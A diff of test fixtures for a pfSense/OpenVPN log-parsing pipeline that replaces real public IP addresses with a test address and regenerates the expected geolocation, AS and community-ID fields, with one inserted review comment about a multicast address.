- "ingested": "2021-09-14T22:09:25.467690599Z",
+ "ingested": "2021-12-09T13:44:41.123283900Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled)",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -465,25 +465,27 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
+ "lon": 125.3228,
+ "lat": 43.88
 },
- "country_iso_code": "US"
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 20052,
+ "number": 4837,
 "organization": {
- "name": "Arbor Networks, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
- "address": "146.88.240.4",
+ "address": "175.16.199.1",
 "port": 34745,
- "ip": "146.88.240.4"
+ "ip": "175.16.199.1"
 },
- "message": "TLS Error: cannot locate HMAC in incoming packet from [AF_INET]146.88.240.4:34745",
+ "message": "TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745",
 "tags": [
 "preserve_original_event"
 ],
@@ -499,12 +501,12 @@
 },
 "related": {
 "ip": [
- "146.88.240.4"
+ "175.16.199.1"
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467693239Z",
- "original": "\u003c27\u003e1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]146.88.240.4:34745",
+ "ingested": "2021-12-09T13:44:41.123288200Z",
+ "original": "\u003c27\u003e1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745",
 "provider": "openvpn",
 "timezone": "-05:00",
 "kind": "event",
@@ -533,7 +535,7 @@
 },
 "message": "user 'bob' could not authenticate.",
 "event": {
- "ingested": "2021-09-14T22:09:25.467696022Z",
+ "ingested": "2021-12-09T13:44:41.123293100Z",
 "original": "\u003c36\u003e1 2021-07-03T22:40:38.477134-05:00 pfSense.example.com openvpn 68813 - - user 'bob' could not authenticate.",
 "provider": "openvpn",
 "timezone": "-05:00",
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log
index d2f6725f25e..1d883a80c93 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log
@@ -1,14 +1,14 @@
-<134>1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale
-<134>1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale
 <134>1 2021-07-03T19:10:14.578333-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,63,29559,0,DF,17,udp,69,10.170.27.50,10.170.27.1,52797,53,49
-<134>1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale
-<134>1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 
146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale
 <134>1 2021-07-03T19:10:14.578380-05:00 pfSense.example.com filterlog 72237 - - 118,,,1534283903,igb1.12,match,pass,in,4,0x0,,64,58337,0,DF,6,tcp,64,10.170.12.21,127.0.0.1,62132,53,0,S,3671644853,,32768,,mss;nop;wscale;sackOK;nop;nop;nop;nop;TS
-<134>1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale
-<134>1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale
 <134>1 2021-07-03T19:10:15.590279-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,3666,0,DF,17,udp,69,10.170.27.9,10.170.27.1,26641,53,49
 <134>1 2021-07-03T19:10:15.590303-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,51896,0,DF,17,udp,69,10.170.27.9,192.168.1.1,26641,53,49
-<134>1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale
-<134>1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 
72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale
-<134>1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,239.255.255.250,58037,1900,180
+<134>1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale
+<134>1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,175.16.199.1,58037,1900,180
 <134>1 2021-09-14T15:31:58.860079-05:00 pfSense.example.com filterlog 72913 - - 176,,,1520797901,igb1.50,ip-option,pass,in,4,0xc0,,1,20651,0,none,2,igmp,32,10.100.10.23,224.0.0.1,datalength=8
\ No newline at end of file
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json
index 21ed8782ba9..dbea9bd7326 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-syslog.log-expected.json
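Review bot: The last added line of this hunk (the `183,,,1520797915,igb1.40` udp/1900 record) now carries the unicast destination `175.16.199.1` where the previous sample had the SSDP multicast group `239.255.255.250`; that address is reserved multicast space rather than a routable public address, so it did not need scrubbing, and substituting a unicast address changes what the sample represents. With the change, this fixture loses its only multicast-destination filterlog record, so whatever the pipeline does for multicast destinations (presumably no geo/AS enrichment) is no longer verified here unless another fixture covers it. Keeping `239.255.255.250` on that line and regenerating only its expected entry would preserve that case; the sibling igmp record to `224.0.0.1` on the following context line was left alone, which is the consistent treatment. The -expected.json entry for this record is not within the visible hunks.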
@@ -8,23 +8,25 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
+ "lon": 125.3228,
+ "lat": 43.88
 },
- "country_iso_code": "AU"
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 13335,
+ "number": 4837,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
- "address": "1.1.1.1",
+ "address": "175.16.199.1",
 "port": 853,
- "ip": "1.1.1.1"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "id": "1535324496"
@@ -34,12 +36,12 @@
 "address": "10.170.12.50",
 "ip": "10.170.12.50"
 },
- "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale",
+ "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:wy1ypTt8ds5FMl3xQEEgnZtVBL4=",
+ "community_id": "1:pOXVyPJTFJI5seusI/UD6SwvBjg=",
 "transport": "tcp",
 "type": "ipv4",
 "bytes": 60,
@@ -84,14 +86,14 @@
 },
 "related": {
 "ip": [
- "1.1.1.1",
+ "175.16.199.1",
 "10.170.12.50"
 ]
 },
 "event": {
 "reason": "match",
- "ingested": "2021-09-14T22:09:25.594583565Z",
- "original": "\u003c134\u003e1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale",
+ "ingested": "2021-12-09T13:44:42.068506700Z",
+ "original": "\u003c134\u003e1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale",
 "provider": "filterlog",
 "timezone": "-05:00",
 "kind": "event",
@@ -114,23 +116,25 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
+ "lon": 125.3228,
+ "lat": 43.88
 },
- "country_iso_code": "AU"
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 13335,
+ "number": 4837,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
- "address": "1.1.1.1",
+ "address": "175.16.199.1",
 "port": 853,
- "ip": "1.1.1.1"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "id": "1535324496"
@@ -140,12 +144,12 @@
 "address": "10.170.12.50",
 "ip": "10.170.12.50"
 },
- "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale",
+ "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:pYmzVSkpHUdj0FpkFumL9qhVekw=",
+ "community_id": "1:Fa19AzfMhQ0hUzFzVlg0elr6vsY=",
 "transport": "tcp",
 "type": "ipv4",
 "bytes": 60,
@@ -190,14 +194,14 @@
 },
 "related": {
 "ip": [
- "1.1.1.1",
+ "175.16.199.1",
 "10.170.12.50"
 ]
 },
 "event": {
 "reason": "match",
- "ingested": "2021-09-14T22:09:25.594592383Z",
- "original": "\u003c134\u003e1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale",
+ "ingested": "2021-12-09T13:44:42.068515300Z",
+ "original": "\u003c134\u003e1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale",
 "provider": "filterlog",
 "timezone": "-05:00",
 "kind": "event",
@@ -278,7 +282,7 @@
 },
 "event": {
 "reason": "match",
- "ingested": "2021-09-14T22:09:25.594595221Z",
+ "ingested": "2021-12-09T13:44:42.068520900Z",
 "original": "\u003c134\u003e1 2021-07-03T19:10:14.578333-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,63,29559,0,DF,17,udp,69,10.170.27.50,10.170.27.1,52797,53,49",
 "provider": "filterlog",
 "timezone": "-05:00",
@@ -302,23 +306,25 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
+ "lon": 125.3228,
+ "lat": 43.88
 },
- "country_iso_code": "AU"
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 13335,
+ "number": 4837,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
- "address": "1.1.1.1",
+ "address": "175.16.199.1",
 "port": 853,
- "ip": "1.1.1.1"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "id": "1535324496"
@@ -328,12 +334,12 @@
 "address": "10.170.12.50",
 "ip": "10.170.12.50"
 },
- "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale",
+ "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:ZySv0XsmlfDuW4lM8tpl7gn3EQk=",
+ "community_id": "1:tAqWDtAfj7j5rMNBDeS+QrkMsuE=",
 "transport": "tcp",
 "type": "ipv4",
 "bytes": 60,
@@ -378,14 +384,14 @@
 },
 "related": {
 "ip": [
- "1.1.1.1",
+ "175.16.199.1",
 "10.170.12.50"
 ]
 },
 "event": {
 "reason": "match",
- "ingested": "2021-09-14T22:09:25.594597853Z",
- "original": "\u003c134\u003e1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale",
+ "ingested": "2021-12-09T13:44:42.068526200Z",
+ "original": "\u003c134\u003e1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale",
 "provider": "filterlog",
 "timezone": "-05:00",
 "kind": "event",
@@ -408,23 +414,25 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
+ "lon": 125.3228,
+ "lat": 43.88
 },
- "country_iso_code": "AU"
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 13335,
+ "number": 4837,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
- "address": "1.1.1.1",
+ "address": "175.16.199.1",
 "port": 853,
- "ip": "1.1.1.1"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "id": "1535324496"
@@ -434,12 +442,12 @@
 "address": "10.170.12.50",
 "ip": "10.170.12.50"
 },
- "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale",
+ "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:x3HLD/mdNyapXWjulF1YXRSQPZQ=",
+ "community_id": "1:aegOV8wdmNfz6BR84Lx6HaGqkEs=",
 "transport": "tcp",
 "type": "ipv4",
 "bytes": 60,
@@ -484,14 +492,14 @@
 },
 "related": {
 "ip": [
- "1.1.1.1",
+ "175.16.199.1",
 "10.170.12.50"
 ]
 },
 "event": {
 "reason": "match",
- "ingested": "2021-09-14T22:09:25.594600456Z",
- "original": "\u003c134\u003e1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale",
+ "ingested": "2021-12-09T13:44:42.068531500Z",
+ "original": "\u003c134\u003e1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale",
 "provider": "filterlog",
 "timezone": "-05:00",
 "kind": "event",
@@ -585,7 +593,7 @@
 },
 "event": {
 "reason": "match",
- "ingested": "2021-09-14T22:09:25.594603049Z",
+ "ingested": "2021-12-09T13:44:42.068536800Z",
 "original": "\u003c134\u003e1 2021-07-03T19:10:14.578380-05:00 pfSense.example.com filterlog 72237 - - 118,,,1534283903,igb1.12,match,pass,in,4,0x0,,64,58337,0,DF,6,tcp,64,10.170.12.21,127.0.0.1,62132,53,0,S,3671644853,,32768,,mss;nop;wscale;sackOK;nop;nop;nop;nop;TS",
 "provider": "filterlog",
 "timezone": "-05:00",
@@ -609,26 +617,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -638,12 +645,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:iPfvojX0zag/qQ6zKR3MnpIlYx8=", + "community_id": "1:n6e31n2xF55JR2WREtsRUpXlkf0=", "transport": "tcp", "type": "ipv4", "bytes": 60, 
@@ -688,14 +695,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594605680Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068542100Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -718,23 +725,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" 
@@ -744,12 +753,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:x3HLD/mdNyapXWjulF1YXRSQPZQ=", + "community_id": "1:aegOV8wdmNfz6BR84Lx6HaGqkEs=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -794,14 +803,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594608307Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068547600Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -882,7 +891,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594610921Z", + "ingested": "2021-12-09T13:44:42.068553Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590279-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,3666,0,DF,17,udp,69,10.170.27.9,10.170.27.1,26641,53,49", "provider": "filterlog", "timezone": "-05:00", 
@@ -964,7 +973,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594613537Z", + "ingested": "2021-12-09T13:44:42.068558600Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590303-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,51896,0,DF,17,udp,69,10.170.27.9,192.168.1.1,26641,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -988,26 +997,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "region_iso_code": "AU-SA", - "city_name": "Adelaide", - "country_iso_code": "AU", - "country_name": "Australia", - "region_name": "South Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 138.6005, - "lat": -34.9274 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.0.0.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.0.0.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1017,12 +1025,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KOUO4DlIIBIJZptxMOvx/CV/TL4=", + "community_id": "1:hU8z0kIzXfY6WDCCq4pzWYAEs8U=", "transport": "tcp", "type": "ipv4", "bytes": 60, 
@@ -1067,14 +1075,14 @@ }, "related": { "ip": [ - "1.0.0.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:25.594616132Z", - "original": "\u003c134\u003e1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:42.068563900Z", + "original": "\u003c134\u003e1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", "kind": "event", @@ -1097,23 +1105,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" 
